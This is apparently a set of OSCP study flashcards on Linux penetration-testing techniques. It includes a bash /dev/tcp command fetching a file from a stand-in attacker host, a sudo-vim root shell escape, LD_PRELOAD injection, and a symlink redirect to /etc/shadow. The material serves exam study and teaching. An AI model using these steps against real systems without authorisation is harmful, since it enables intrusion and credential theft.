← All OSCP Flashcard Decks

Linux Flashcards

7 cards from real OSCP practice questions. Tap to flip, then mark Knew It or Still Learning — missed cards come back until you master them.

Read the first 7 Linux flashcards as text
  1. What command transfers a file from an attacker's machine to a victim Linux box using only built-in tools when curl and wget are unavailable?

    Answer: bash -c 'cat > /tmp/file.sh < /dev/tcp/attacker/80'

    Bash's built-in /dev/tcp pseudo-device allows file transfers by reading from a TCP connection without needing curl, wget, or netcat.

  2. Which file contains the list of users allowed to use the 'at' command for scheduling tasks, which could be abused for persistence?

    Answer: /etc/at.allow

    /etc/at.allow specifies which users may submit jobs to the at scheduler; if the file doesn't exist, /etc/at.deny controls access instead.

  3. A penetration tester finds that /etc/sudoers contains 'user ALL=(ALL) NOPASSWD: /usr/bin/vim'. How can this be exploited for privilege escalation?

    Answer: Run 'sudo vim' then use ':!/bin/bash' to spawn a root shell

    Vim's shell escape ':!/bin/bash' spawns a shell that inherits vim's permissions, so running vim via sudo produces a root shell.

  4. What is a Linux 'shared object injection' (LD_PRELOAD) attack?

    Answer: Loading a malicious shared library before the standard ones to override functions in a privileged binary

    LD_PRELOAD forces the dynamic linker to load a specified shared library first, allowing an attacker to override libc functions in any binary that respects this variable.

  5. Which command checks for world-writable files owned by root that could be abused to escalate privileges?

    Answer: find / -user root -perm -o=w -type f 2>/dev/null

    This find command locates files owned by root but writable by anyone (other-write permission), which may allow an attacker to modify root-owned scripts or configs.

  6. During an OSCP exam, you notice a service running as root that reads a config file from /tmp. What attack is this vulnerable to?

    Answer: Symlink attack — replace the config file with a symlink to /etc/shadow

    If a root process reads from an attacker-writable location like /tmp, a symlink placed there can redirect the read to any file, leaking sensitive data or causing unintended writes.

  7. What does 'umask 022' mean for newly created files on a Linux system?

    Answer: Files get default permissions of 644 (rw-r--r--) for files and 755 for directories

    umask 022 subtracts write permissions for group and others from the default 666 for files (giving 644) and from 777 for directories (giving 755).